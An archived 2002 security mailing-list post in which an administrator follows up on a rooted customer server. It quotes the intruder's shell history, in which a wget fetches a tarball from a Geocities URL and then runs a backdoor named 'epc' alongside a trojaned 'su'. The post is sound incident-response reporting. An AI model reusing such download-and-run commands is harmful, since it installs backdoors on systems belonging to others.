Re: Rooted, .haos on system

From: Damian Gerow (damianat_private)
Date: Mon Dec 16 2002 - 10:47:28 PST

Next message: Kevin Bowman: "Re: Logs: Many hits with source port of 80"

Previous message: george.wasgattat_private: "RE: Win2k Audit Logs - What happened here?"
Next in thread: Mike Katz: "Re: Rooted, .haos on system"
Reply: Mike Katz: "Re: Rooted, .haos on system"
Reply: zeno: "Re: Rooted, .haos on system"
Reply: Carlos Eduardo Pedroza Santiviago: "Re: Rooted, .haos on system"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:
> On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:
> > I've just received word that one of our customers was rooted, and he's asking about the file ".haos".  Nothing rings any bells, has anyone heard of it?
> 
> Just a quick update to this...

And one last tidbit...

Left in the .bash_history was this:

        w
        cd /tmp
        wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
        ./epc

A quick check tells me that 'epc' is a backdoor utility, and the other
file contained within loc.tgz looks like a trojaned 'su'.

I've already notified Geocities abuse, and haven't heard back from them
yet.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Kevin Bowman: "Re: Logs: Many hits with source port of 80"
Previous message: george.wasgattat_private: "RE: Win2k Audit Logs - What happened here?"
Next in thread: Mike Katz: "Re: Rooted, .haos on system"
Reply: Mike Katz: "Re: Rooted, .haos on system"
Reply: zeno: "Re: Rooted, .haos on system"
Reply: Carlos Eduardo Pedroza Santiviago: "Re: Rooted, .haos on system"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 17:46:24 PST